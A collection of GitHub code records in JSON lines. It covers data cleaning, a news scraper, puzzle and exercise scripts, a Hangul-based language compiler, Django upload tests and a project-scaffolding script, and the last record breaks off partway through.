+{"seq_id":"6626034023","text":"#Lightning Export dataset cleaning\n\nimport numpy as np\n\n#import the data, and make sure the formatting is correct\n# PLEASE NOTE: the dtype of this array is float64\n# that is to say, each entry is of type float64\ncsv = np.genfromtxt('LightningExport2.csv', delimiter = \",\", usecols=np.arange(0,21), skip_header=1)\n\n#extract the 9 useful columns\ncsv = csv[:, [0, 2, 3, 12, 14, 15, 16, 17, 18]]\nindices = np.argsort = [0,2,1,4,5,6,7,8,3]\ncsv = csv[:, indices]\n#the columns of the csv now represent\n# 0 - MLS number\n# 1 - soldprice (our y)\n# 2 - listprice\n# 3 - bedroom count\n# 4 - bathroom count\n# 5 - sqft of property\n# 6 - age\n# 7 - lot size\n\n#elimnating rows with nan\n#originally, we have 54760 listings\n#after we remove the rows with NaNs, we have 54696 listings\n#this preserves over 99.9% of listings, so it seems like a reasonably sane action to take\ncsv = csv[~np.isnan(csv).any(axis=1)]\n\n#remove duplicates\n#now we have 53,167 listings!\nunique_keys, indices = np.unique(csv[:,0], return_index=True)\ncsv = csv[indices]\n\n#change zip code to categorical - 1-hot\n#we appear to have 621 unique zips!\nzips = csv[:,8]\nunique_zips = np.sort(np.unique(zips))\nnum_zips = np.unique(zips).shape[0]\n\nonehot = np.zeros((zips.shape[0], num_zips))\nfor i in range(zips.shape[0]):\n\tindex = np.where(unique_zips == zips[i])\n\tonehot[i,index] = 1\n\nnp.save(\"nothot\", csv)\n\n#replace last column in the array with 621 columns of one-hot encoding\ncsv = np.delete(csv, 8, axis = 1)\ncsv = np.concatenate((csv, onehot), axis=1)\n\n\n\n\n#save the clean data\n#np.save(\"clean\", csv)\n\n# counter = 1\n# for row in csv:\n# \tprint(counter)\n# \tprint(row)\n# \tcounter +=1","repo_name":"catabia/real_estate_price_prediction","sub_path":"experiments_without_list_price/LEcleaning.py","file_name":"LEcleaning.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73715559592","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom datetime import datetime\nfrom fagaiwei.settings import session, NewsItemInfo\nfrom fagaiwei.items import FagaiweiItem\nclass ZjzxSpider(scrapy.Spider):\n #新浪财经\n name = 'sinacaijing'\n allowed_domains = ['sina.com.cn']\n start_urls = [\n 'http://finance.sina.com.cn/roll/index.d.html?cid=56995' , #期市要闻\n 'http://roll.finance.sina.com.cn/finance/jj4/index_1.shtml' , #基金新闻\n 'http://finance.sina.com.cn/forex/' , #外汇\n 'http://finance.sina.com.cn/nmetal/' , #黄金\n ]\n\n def parse(self, response):\n url_list = response.xpath('//ul[@data-client=\"scroll\"]/li/a/@href | //ul[@class=\"list_009\"]/li/a/@href ').extract()\n for url in url_list:\n result = session.query(NewsItemInfo).filter_by(url=url, web_id=42).count()\n if result:\n # print(\"{} 存在\".format(url))\n pass\n else:\n yield scrapy.Request(url,callback=self.process_detail,meta={'web':response.url})\n\n def process_detail(self,response):\n if response.xpath('//*[@id=\"artibody\"]'):\n item = FagaiweiItem()\n item['web_id'] = 42\n item['url'] = response.url\n item['title'] = response.xpath('//div[contains(@class,\"main-content\")]/h1/text()').extract_first(default='')\n item['web'] = response.meta.get('web')\n item['keyword'] = ''\n item['webname'] = response.xpath('//a[contains(@class,\"source\")]/text()|//span[contains(@class,\"source\")]/text()').extract_first(default='新浪财经')\n item['pub_time'] = 
response.xpath('//span[@class=\"date\"]/text()').extract_first(default=datetime.now().strftime(\"%Y-%m-%d %H:%M\")).replace('年','-').replace('月','-').replace('日','')\n content = '\\n'.join(response.xpath('//*[@id=\"artibody\"]/p/text() | \\\n //*[@id=\"artibody\"]//p/span/a/text() | \\\n //*[@id=\"artibody\"]//p/span/text() | \\\n //*[@id=\"artibody\"]/div//p/text()').extract())\n if not content:\n content = '这可能是图片或者文件,打开查看!'\n item['content'] = content.replace('\\u3000','').replace('\\xa0','').replace('\\t\\t\\t\\n','').replace('\\n\\n','')\n yield item","repo_name":"KKtoNN/python_spider","sub_path":"fagaiwei/fagaiwei/spiders/42sinacaijing.py","file_name":"42sinacaijing.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"24483814230","text":"print(\"starting\")\r\n\r\nsumOfPals = 0\r\n\r\ndef inBinary(x):\r\n largestPower = 0\r\n binaryText = \"\"\r\n currentNum=x\r\n while x>=2**(largestPower+1):\r\n largestPower +=1\r\n for i in range(largestPower,-1,-1):\r\n if 2**i<=currentNum:\r\n binaryText += \"1\"\r\n currentNum -=2**i\r\n else:\r\n binaryText += \"0\"\r\n return binaryText\r\n\r\ndef isPal(x):\r\n l = len(x)-1\r\n for i in range(0,len(x)):\r\n if i >= l-i:\r\n break\r\n if x[i] != x[l-i]:\r\n return False\r\n return True\r\n\r\nfor i in range(1,1000001,2):\r\n print(i)\r\n if isPal(str(i)) and isPal(inBinary(i)):\r\n sumOfPals += i\r\n\r\nprint(sumOfPals)\r\n\r\ninput(\"press Something\")\r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 36.py","file_name":"problem 36.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18596004281","text":"import logging\n\nfrom lib.termcolor import colored\n\n\n# git://gist.github.com/1238935.git\nclass Logger(object):\n def __init__(self, name):\n self.color_map = {'debug': {'color': 'grey', 'attrs': ['bold']},\n 'info': {'color': 'white'},\n 'warn': {'color': 'yellow', 'attrs': ['bold']},\n 'error': {'color': 'red'},\n 'fatal': {'color': 'red', 'attrs': ['bold']},\n }\n self.logger = logging.getLogger(name)\n self.logger.setLevel(logging.INFO)\n self.stdout = logging.StreamHandler()\n self.stdout.setLevel(logging.INFO)\n self.stdout.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s', '%Y-%m-%d %H:%M:%S'))\n self.logger.addHandler(self.stdout)\n\n def __getattr__(self, status, attrs=[]):\n if status in ('debug', 'info', 'warn', 'error', 'fatal'):\n return lambda msg, *args: getattr(self.logger, status)(\n colored(msg, **self.color_map[status]), *args)\n","repo_name":"knmkr/dbsnp-pg","sub_path":"script/python/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"41458749969","text":"#\n# @lc app=leetcode id=728 lang=python3\n#\n# [728] Self Dividing Numbers\n#\n\n# @lc code=start\nclass Solution:\n def selfDividingNumbers(self, left: int, right: int) -> List[int]:\n result = []\n for i in range(left, right+1):\n flag = True\n str_i = str(i)\n for j in str_i:\n num_j = int(j)\n if num_j == 0 or i % num_j != 0:\n flag = False\n break\n if flag:\n result.append(i)\n\n return result\n\n\n# @lc 
code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2023/728.self-dividing-numbers.py","file_name":"728.self-dividing-numbers.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75025161191","text":"#Still working with files \r\n\r\nwith open(\"life-expectancy.csv\") as world_data:\r\n    world_data.readline()\r\n    the_life_exp_range = []\r\n    country_name = []\r\n    year_value = []\r\n    \r\n    for i in world_data:\r\n        i = i.strip()\r\n        world_h = i.split(\",\")\r\n        \r\n        the_life_exp_range.append(world_h)\r\n        \r\n    max_value = -1\r\n    max_country = ''\r\n    max_year = ''\r\n    min_value = float('inf')\r\n    min_country = ''\r\n    min_year = ''\r\n    year_to_check = int(input('Enter the year of interest? '))\r\n    \r\n    average_list = []\r\n    maximum_year = ''\r\n    maximum_country = ''\r\n    maximum_value = -1\r\n    minimum_value = float('inf')\r\n    minimum_country = ''\r\n\r\n    for exp_values in the_life_exp_range:\r\n        country_name = exp_values[0]\r\n        country_code = exp_values[1]\r\n        country_year = int(exp_values[2])\r\n        country_value = float(exp_values[3])\r\n        \r\n        if country_value > max_value:\r\n            max_value = country_value\r\n            max_country = country_name\r\n            max_year = country_year\r\n        \r\n        if country_value < min_value:\r\n            min_value = country_value\r\n            min_country = country_name\r\n            min_year = country_year\r\n        \r\n        if year_to_check == country_year:\r\n            average_list.append(country_value)\r\n            length = len(average_list)\r\n            total = sum(average_list)\r\n            average = total / length\r\n            \r\n            if country_value > maximum_value:\r\n                maximum_value = country_value\r\n                maximum_country = country_name\r\n            if country_value < minimum_value:\r\n                minimum_value = country_value\r\n                minimum_country = country_name\r\n            \r\n            \r\n    \r\nprint(\"The Overall max life expectancy is: {} from {}, in {}. \".format(max_value, max_country, max_year))\r\nprint()\r\nprint(\"The Overall min life expectancy is: {} from {}, in {}. 
\\n\".format(min_value, min_country, min_year))\r\nprint(\"For the year {}\".format(year_to_check))\r\nprint(\"The average life expentency accross all countries was {:,.2f}\".format(average))\r\nprint(\"The max life expetency was in {} with {:,.2f}\".format(maximum_country, maximum_value))\r\nprint(\"The min life expetency was in {} with {}\".format(minimum_country, minimum_value))\r\nprint()\r\n\r\n\r\n","repo_name":"code-lova/BYU-Python-programming","sub_path":"programming_building_blocks/week11/stretch.py","file_name":"stretch.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19505181150","text":"# coding: utf-8\n\nimport io\nimport re\nimport sys\n\nimport template\n\n\n# noinspection PyShadowingBuiltins\ndef compile(source, out_file, newline_in=(u'\\r\\n', u'\\n', u'\\r'),\n naive_border=False, nop_character=u'ㅇ',\n newline_out=u'\\n', nop_pattern=(\n ('nop_ignored', 'nop_ignored_v', 'nop_ignored'),\n ('nop_ignored_h', 'nop', 'nop_ignored_h'),\n ('nop_ignored', 'nop_ignored_v', 'nop_ignored'),\n ), remove_trailing_newline=True,\n remove_leading_newline=False):\n re_splitlines = re.compile(u'|'.join(\n re.escape(s)\n for s in reversed(sorted(newline_in, key=len))\n ))\n lines = re_splitlines.split(source)\n\n if remove_trailing_newline == -1:\n remove_trailing_newline = len(lines)\n for __ in range(remove_trailing_newline):\n if not lines or lines[-1]:\n break\n lines.pop()\n\n if remove_leading_newline == -1:\n remove_leading_newline = len(lines)\n offset = 0\n for __ in range(remove_leading_newline):\n if len(lines) <= offset or lines[offset]:\n break\n offset += 1\n if offset:\n lines = lines[offset:]\n\n height = len(lines)\n width = max(len(line) for line in lines) if lines else 0\n\n left_end = [0] * height\n right_end = [len(line) for line in lines]\n top_end = [height] * width\n bottom_end = [0] * width\n\n for r in range(height):\n for c in range(len(lines[r])):\n top_end[c] = min(top_end[c], r)\n bottom_end[c] = r\n\n for c in range(width):\n if top_end[c] > bottom_end[c]:\n bottom_end[c] = top_end[c]\n\n # templates\n border_intersection = template.template_border_intersection\n if naive_border:\n border_top = template.template_border_top_naive\n border_left = template.template_border_left_naive\n else:\n border_top = template.template_border_top\n border_left = template.template_border_left\n\n # TODO: XXX\n nop = [\n [getattr(template, 'template_' + s) for s in r]\n for r in nop_pattern\n ]\n\n hangul_templates = template.hangul_templates\n\n # top border\n for r_t in range(len(border_intersection)):\n translate_table = {\n 0x3147: ord(nop_character), # ord(u'ㅇ') == 0x3147\n }\n out_file.write(border_intersection[r_t].translate(translate_table))\n for c in range(width):\n out_file.write(border_top[r_t].translate(translate_table))\n out_file.write(newline_out)\n\n for r, line in enumerate(lines):\n for r_t in range(len(border_left)):\n translate_table = {\n 0x3147: ord(nop_character), # ord(u'ㅇ') == 0x3147\n }\n out_file.write(border_left[r_t].translate(translate_table))\n for c in range(width):\n translate_table = {\n 0x3147: ord(nop_character), # ord(u'ㅇ') == 0x3147\n }\n if c >= len(line) or not (u'\\uAC00' <= line[c] <= u'\\uD7A3'):\n cell_char = None\n\n left_over = c < left_end[r]\n right_over = c >= right_end[r]\n top_over = r < top_end[c]\n bottom_over = r >= bottom_end[c]\n\n # XXX\n cell_template = nop[1 - top_over + bottom_over][1 - left_over + right_over]\n 
else:\n cell_char = line[c]\n code_point = ord(cell_char)\n vowel = (code_point - 0xAC00) // 28 % 21\n consonants = code_point - vowel * 28\n\n translate_table.update({\n 0xCC28: consonants, # ord(u'차') == 0xCC28\n 0xCC98: consonants + 112, # ord(u'처') == 0xCC98\n 0xCD08: consonants + 224, # ord(u'초') == 0xCD08\n 0xCD94: consonants + 364, # ord(u'추') == 0xCD94\n })\n\n cell_template = hangul_templates[vowel]\n\n out_file.write(cell_template[r_t].translate(translate_table))\n out_file.write(newline_out)\n\n\ndef main(filename_in, filename_out):\n with io.open(filename_in, 'r', encoding='utf-8', newline=u'') as file_in:\n source = file_in.read()\n\n with io.open(filename_out, 'w', encoding='utf-8', newline=u'') as file_out:\n compile(source, file_out)\n\n\nif __name__ == '__main__':\n main(*sys.argv[1:])\n","repo_name":"Sait2000/jeoheui","sub_path":"compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"131803749","text":"import uuid\nfrom ffmpy import FFRuntimeError\nfrom unittest import mock\nfrom django.urls import reverse\n\nimport cars.settings\nfrom cars.core.constants import AppPlatform\nfrom cars.core.mds.wrapper import MDSDocumentsWrapper\nfrom cars.django.tests import CarsharingAPITestCase\nfrom cars.users.factories.user import UserFactory\nfrom cars.users.factories.user_documents import UserDocumentPhotoFactory\nfrom cars.users.models.user_documents import UserDocumentBackgroundVideo\nfrom cars.users.models.app_install import AppInstall\n\n\nclass FFmpegMock(object):\n\n def __init__(self, inputs, outputs):\n self.inputs = inputs\n self.outputs = outputs\n\n def run(self, stdout, stderr):\n '''Modifies first input's content and writes it to outputs.'''\n with open(next(iter(self.inputs.keys())), 'rb') as infile:\n modified_data = b'converted_' + infile.read()\n for outfile_name in self.outputs:\n with open(outfile_name, 'wb') as outfile:\n outfile.write(modified_data)\n\n\ndef make_ffprobe_mock(return_format):\n\n class FFProbeMock(object):\n\n def __init__(self, name):\n video_mock = mock.MagicMock(codec_name=return_format)\n self.video = [video_mock]\n\n return FFProbeMock\n\n\nclass UserDocumentBackgroundVideoUploadTestCase(CarsharingAPITestCase):\n\n def setUp(self):\n user_uid = cars.settings.YAUTH_TEST_USER['login']\n self.user = UserFactory.create(uid=user_uid, username=user_uid)\n self.app_install = AppInstall.objects.get(user=self.user)\n self.photo = UserDocumentPhotoFactory.create(document__user=self.user)\n self.mds_client = MDSDocumentsWrapper.from_settings()\n # no convertions for common tests\n self.set_platform(AppPlatform.IOS.value)\n\n def set_platform(self, platform):\n self.app_install.platform = platform\n self.app_install.save()\n\n def get_url(self, photo):\n return reverse(\n 'drive:user-document-photo-background-video',\n kwargs={\n 'document_id': photo.document.id,\n 'photo_id': photo.id,\n },\n )\n\n def upload(self, data, content_type='video/mp4'):\n url = self.get_url(self.photo)\n response = self.client.put(url, data=data, content_type=content_type)\n return response\n\n def test_ok(self):\n response = self.upload(b'test')\n self.assert_response_ok(response)\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'test')\n\n def test_different_content_type(self):\n 
self.upload(b'test', content_type='video/webm')\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n self.assertEqual(video.mime_type, 'video/webm')\n\n def test_no_data(self):\n response = self.upload(None)\n self.assert_response_bad_request(response)\n\n def test_other_user(self):\n user = UserFactory.create()\n photo = UserDocumentPhotoFactory.create(document__user=user)\n url = self.get_url(photo)\n response = self.client.put(url, data=b'test', content_type='video/mp4')\n self.assert_response_not_found(response)\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_not_needed_platform(self, ffmpy_mock, ffprobe_mock):\n '''Check that if platform is iOS, no ffmpeg-conversion is run.'''\n self.set_platform(AppPlatform.IOS.value)\n response = self.upload(b'video_content_0')\n self.assert_response_ok(response)\n self.assertFalse(ffmpy_mock.called)\n self.assertFalse(ffprobe_mock.called)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'video_content_0')\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_not_needed_format(self, ffmpy_mock, ffprobe_mock):\n '''Check that if ffprobe returns h264, no ffmpeg-conversion is run.'''\n ffprobe_mock.side_effect = make_ffprobe_mock('h264')\n\n self.set_platform(AppPlatform.ANDROID.value)\n response = self.upload(b'video_content_0')\n self.assert_response_ok(response)\n self.assertTrue(ffprobe_mock.called)\n self.assertFalse(ffmpy_mock.called)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'video_content_0')\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_needed(self, ffmpy_mock, ffprobe_mock):\n '''Check that if platform is Android, video is being converted with ffmpeg.'''\n ffprobe_mock.side_effect = make_ffprobe_mock('mpeg4')\n ffmpy_mock.side_effect = FFmpegMock\n self.set_platform(AppPlatform.ANDROID.value)\n response = self.upload(b'video_content_1')\n self.assert_response_ok(response)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'converted_video_content_1')\n\n @mock.patch('ffprobe3.FFProbe')\n @mock.patch('ffmpy.FFmpeg')\n def test_conversion_fails(self, ffmpy_mock, ffprobe_mock):\n '''Check that if ffmpeg run fails, unconverted video is uploaded to mds.'''\n ffprobe_mock.side_effect = make_ffprobe_mock('mpeg4')\n ffmpy_mock.side_effect = FFRuntimeError('', 42,\n b'', b'')\n self.set_platform(AppPlatform.ANDROID.value)\n response = self.upload(b'video_content_2')\n self.assert_response_ok(response)\n\n video = UserDocumentBackgroundVideo.objects.get(photo=self.photo)\n mds_response = self.mds_client.get_user_document_background_video(video)\n self.assertEqual(mds_response['Body'].read(), b'video_content_2')\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"drive/tests/test_video_upload.py","file_name":"test_video_upload.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15191478229","text":"import heapq\r\n\r\nK = int(input())\r\nadj = [dict() for i in range(K)]\r\nfor 
i in range(1, K):\r\n adj[i] = dict()\r\n adj[i][(i+1)%K] = 1\r\n adj[i][(i*10)%K] = 0\r\n\r\ndef dijkstra(adj):\r\n q = []# p q\r\n d = dict()# min cost from start\r\n p = dict()# parent node\r\n n = len(adj)# num of node\r\n\r\n for i in range(n):\r\n d[i] = float('inf')\r\n\r\n start_id = 1\r\n d[start_id] = 0\r\n heapq.heappush(q, (0, start_id))\r\n S = set()\r\n\r\n while len(S) != n:\r\n dist, node_id = heapq.heappop(q)\r\n S.add(node_id)\r\n for u, c in adj[node_id].items():\r\n if c + d[node_id] < d[u]:\r\n d[u] = c + d[node_id]\r\n heapq.heappush(q, (d[u], u))\r\n\r\n return d\r\n\r\nd = dijkstra(adj)\r\nprint(d[0]+1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc084/B/1995966.py","file_name":"1995966.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"36969446536","text":"\"\"\"\nMake a project directory with associated setup\n\"\"\"\n\nimport argparse\nfrom copy import deepcopy\nimport errno\nimport frontmatter\nfrom functools import wraps\nimport inspect\nfrom licenses import LICENSES\nimport logging\nimport os\nfrom pprint import pformat\nimport re\nimport requests\nimport shutil\nfrom string import Formatter\nimport subprocess\nimport sys\nimport traceback\n\n\nDEFAULT_LOG_LEVEL = logging.INFO\nPOSITIONAL_ARGUMENTS = sorted([\n ['-l', '--loglevel', logging.getLevelName(DEFAULT_LOG_LEVEL),\n 'desired logging level (' +\n 'case-insensitive string: DEBUG, INFO, WARNING, or ERROR'],\n ['-v', '--verbose', False, 'verbose output (logging level == INFO)'],\n ['-w', '--veryverbose', False,\n 'very verbose output (logging level == DEBUG)'],\n ['-c', '--create', False, 'create directory at indicated path'],\n ['-p', '--pyvenv', False, 'create a python virtual environment'],\n ['-n', '--pyversion', '3', 'version of python to use in virtual '\n 'environment'],\n ['-g', '--git', False, 'create a new git repository'],\n ['-s', '--script', False, 'set up with a python script'],\n ['-k', '--package', False, 'set up as a python package'],\n ['-r', '--readme', False, 'add a readme file template'],\n ['-q', '--quiet', False, 'suppress output (logging level == CRITICAL)'],\n ['-x', '--license', 'agpl-3.0', 'license to use (\"none\" is an option)'],\n ['-kv', '--pkgversion', '0.1', 'PEP440 version number to use in setup.py'],\n ['-kd', '--pkgdescription', 'change me', 'description to use in setup.py'],\n ['-kh', '--pkghomepage', 'http://change.me', 'home page to use in '\n 'setup.py'],\n ['-ka', '--pkgauthor', 'Change Me', 'user name to use in setup.py'],\n ['-ke', '--pkgemail', 'change@me.org', 'email address to use in setup.py'],\n ['-cs', '--classdevstatus', '1 - Planning', 'development status '\n 'classifier to use in '\n 'setup.py'],\n ['-ca', '--classaudience', 'Developers', 'intended audience classifier '\n 'to use in setup.py'],\n ['-ct', '--classtopic', 'Change Me', 'topic classifier to use in '\n 'setup.py'],\n ['-kk', '--pkgkeywords', '\"change me\", \"please change me', 'keywords to '\n 'use in '\n 'setup.py']\n])\ntemplate_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'templates')\nGITIGNORE_FILE = os.path.join(template_dir, 'gitignore.txt')\nTEMPLATES = {\n 'script-2': os.path.join(template_dir, 'script_template_2.py'),\n 'script-3': os.path.join(template_dir, 'script_template_3.py'),\n 'package-3': os.path.join(template_dir, 'package_template_3.py'),\n 'readme': os.path.join(template_dir, 'README.md'),\n 'requirements': 
os.path.join(template_dir, 'requirements_dev.txt'),\n 'setup': os.path.join(template_dir, 'setup_template.py'),\n 'setup_config': os.path.join(template_dir, 'setup.cfg'),\n 'manifest': os.path.join(template_dir, 'MANIFEST.in'),\n 'test_template3': os.path.join(template_dir, 'test_template3.py')\n}\nTEMPLATE_RENAMES = {\n 'setup_template.py': 'setup.py'\n}\nPACKAGE_SUBDIRECTORIES = ['scripts', 'tests', 'data']\nLICENSE_FIXES = {\n 'cal': {\n 'prefix': ('https://raw.githubusercontent.com/github/'\n 'choosealicense.com/gh-pages/_licenses/'),\n 'suffix': '.txt'\n }\n}\nDEFAULT_DEPENDENCIES = [\n 'airtight',\n 'better_exceptions',\n 'coverage',\n 'nose'\n]\n\n\ndef arglogger(func):\n \"\"\"\n decorator to log argument calls to functions\n \"\"\"\n @wraps(func)\n def inner(*args, **kwargs):\n logger = logging.getLogger(func.__name__)\n logger.debug(\"called with arguments: %s, %s\" % (args, kwargs))\n return func(*args, **kwargs)\n return inner\n\n\n@arglogger\ndef main(args):\n \"\"\"\n main function\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n\n where = os.path.abspath(args.where)\n # global variables\n if args.script and args.package:\n raise ValueError('cannot create both a script and a package')\n if args.create:\n create_directory(where)\n if args.pyvenv:\n create_venv(where, args.pyversion)\n if args.git:\n create_git(where)\n if args.readme:\n create_readme(where, args.git)\n if args.script:\n init_script(where, args.pyversion, args.git)\n if args.license.lower() != 'none':\n create_license(where, args.license, args.git)\n if args.package:\n init_package(where, args)\n\n\n@arglogger\ndef create_directory(where):\n \"\"\"\n create the project directory at the indicated path\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n try:\n os.makedirs(where)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(where):\n logger.critical(\n 'script run with directory creation, but {0} already exists'\n ''.format(where))\n sys.exit(1)\n logger.info('created new project directory at {0}'.format(where))\n\n\n@arglogger\ndef create_license(where, license, git=False):\n \"\"\"\n add preferred LICENSE file\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n fn = 'LICENSE.txt'\n ld = LICENSES[license]\n try:\n src = ld['src']\n except KeyError:\n logger.warning('License data not found for \"{0}\". 
License creation '\n 'skipped.'.format(license))\n else:\n logger.debug('src: \"{0}\"'.format(src))\n logger.debug('src[0:2]: \"{0}\"'.format(src[0:2]))\n if src[0:2] == '::':\n logger.debug('src[2:]: \"{0}\"'.format(src[2:]))\n src = src[2:]\n url = (LICENSE_FIXES[src]['prefix'] + license +\n LICENSE_FIXES[src]['suffix'])\n else:\n url = src\n targets = [(url, os.path.join(where, fn))]\n fetch(targets, strip_yaml=True)\n if git:\n title = ld['title']\n git_it(where, fn, 'assigned the {0} using text from: {1}'\n ''.format(title, url))\n logger.info('instantiated and committed {0} using {1} from '\n '{2}'.format(fn, title, url))\n else:\n logger.info('instantiated {0} using {0} from {1}'.format(fn, title,\n url))\n\n\n@arglogger\ndef create_readme(where, git=False):\n \"\"\"\n create an initial readme file\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n src = TEMPLATES['readme']\n src = os.path.expanduser(src)\n src = os.path.abspath(src)\n dest_fn = os.path.basename(src)\n dest = os.path.join(where, dest_fn)\n shutil.copy2(src, dest)\n logger.debug('copied {0} to {1}'.format(src, dest))\n if git:\n git_it(os.path.dirname(dest), dest_fn,\n 'include default readme template')\n logger.info('instantiated {0} and committed it'.format(dest_fn))\n else:\n logger.info('instantiated {0}'.format(dest_fn))\n\n\n@arglogger\ndef create_venv(where, python_version):\n \"\"\"\n set up python virtual environment\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n v = '/usr/local/bin/python{0}'.format(python_version)\n venv_name = os.path.basename(where)\n env_dir = '~/Envs/{0}'.format(venv_name)\n if os.path.exists(env_dir):\n logger.critical(\n 'script run with venv creation, but {0} already exists'\n ''.format(env_dir))\n sys.exit(1)\n # somewhy following returns failure code 1 even when successful,\n # so can't try\n cmd = 'mkvirtualenv -v -p {0} {1} && deactivate'.format(v, env_dir)\n run(cmd, check=False) # mkvirtualenv returns non-zero code despite success\n logger.info('instantiated python {0} virtual environment at {1}'\n ''.format(python_version, env_dir))\n run('workon {} && pip install -U pip && deactivate'.format(venv_name))\n logger.info('upgraded pip to latest version')\n for dependency in DEFAULT_DEPENDENCIES:\n cmd = 'workon {} && pip install -U {} && deactivate'.format(\n venv_name, dependency)\n run(cmd)\n logger.info('installed dependency \"{}\"'.format(dependency))\n\n\n@arglogger\ndef create_git(where):\n \"\"\"\n create git repository\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n cmd = 'git init {0}'.format(where)\n run(cmd)\n logger.info('initialized git repository at {0}'.format(where))\n logger.debug('trying to set up .gitignore')\n fp = os.path.join(where, '.gitignore')\n shutil.copy(GITIGNORE_FILE, fp)\n git_it(where, '.gitignore', 'intial values for .gitignore')\n logger.info('instantiated .gitignore and committed it')\n\n\n@arglogger\ndef init_script(where, py_ver, git=False):\n \"\"\"\n include a python script template\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n src = TEMPLATES['script-{0}'.format(py_ver)]\n logger.debug('src: {0}'.format(src))\n src = os.path.expanduser(src)\n logger.debug('src: {0}'.format(src))\n src = os.path.abspath(src)\n logger.debug('src: {0}'.format(src))\n dest_fn = '{0}.py'.format(os.path.basename(where))\n dest = os.path.join(where, dest_fn)\n shutil.copy2(src, dest)\n logger.debug('copied {0} to {1}'.format(src, dest))\n if git:\n 
git_it(os.path.dirname(dest), dest_fn,\n 'include default script template')\n logger.info('added script template as {0}'.format(dest_fn))\n\n\n@arglogger\ndef init_package(where, args):\n \"\"\"\n set up as a python package\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n\n # create subordinate package folders\n for sub_dir in PACKAGE_SUBDIRECTORIES:\n os.makedirs(os.path.join(where, sub_dir))\n pkg_name = os.path.basename(where)\n pkg_name_parts = pkg_name.split('.')\n pkg_pile = os.path.join(where, *pkg_name_parts)\n os.makedirs(pkg_pile)\n\n # stub out additional files using internal templates\n templates = [\n (TEMPLATES['requirements'], []),\n (TEMPLATES['setup'], []),\n (TEMPLATES['setup_config'], []),\n (TEMPLATES['manifest'], []),\n (\n TEMPLATES['script-{}'.format(args.pyversion)],\n ['scripts']\n ),\n (\n TEMPLATES['package-{}'.format(args.pyversion)],\n pkg_name_parts\n ),\n (\n TEMPLATES['test_template{}'.format(args.pyversion)],\n ['tests']\n )\n ]\n for template in templates:\n logger.debug('template: {0}'.format(template[0]))\n src = os.path.expanduser(template[0])\n src = os.path.abspath(src)\n dest_fn = os.path.basename(src)\n dest = os.path.join(where, *template[1], dest_fn)\n shutil.copy2(src, dest)\n logger.debug('copied {0} to {1}'.format(src, dest))\n dest_fn = fixup_template(\n os.path.join(where, *template[1]), template[0], args)\n if args.git:\n git_it(os.path.dirname(dest), dest_fn,\n 'include default {0} template'.format(dest_fn))\n logger.info('instantiated {0} and committed it'.format(dest_fn))\n else:\n logger.info('instantiated {0}'.format(dest_fn))\n\n@arglogger\ndef fixup_template(where, template, args):\n \"\"\"\n rename template and substitute variables if necessary\n \"\"\"\n logger = logging.getLogger(sys._getframe().f_code.co_name)\n fn = os.path.basename(template)\n logger.debug('running fixup_template on {0}'.format(fn))\n with open(os.path.join(where, fn), 'r') as f:\n t = f.read()\n logger.debug('setting up replacements for {0}'.format(fn))\n fkeys = [v[1] for v in Formatter().parse(t) if v[1] is not None]\n if len(fkeys) > 0:\n logger.debug('fkeys: {0}'.format(', 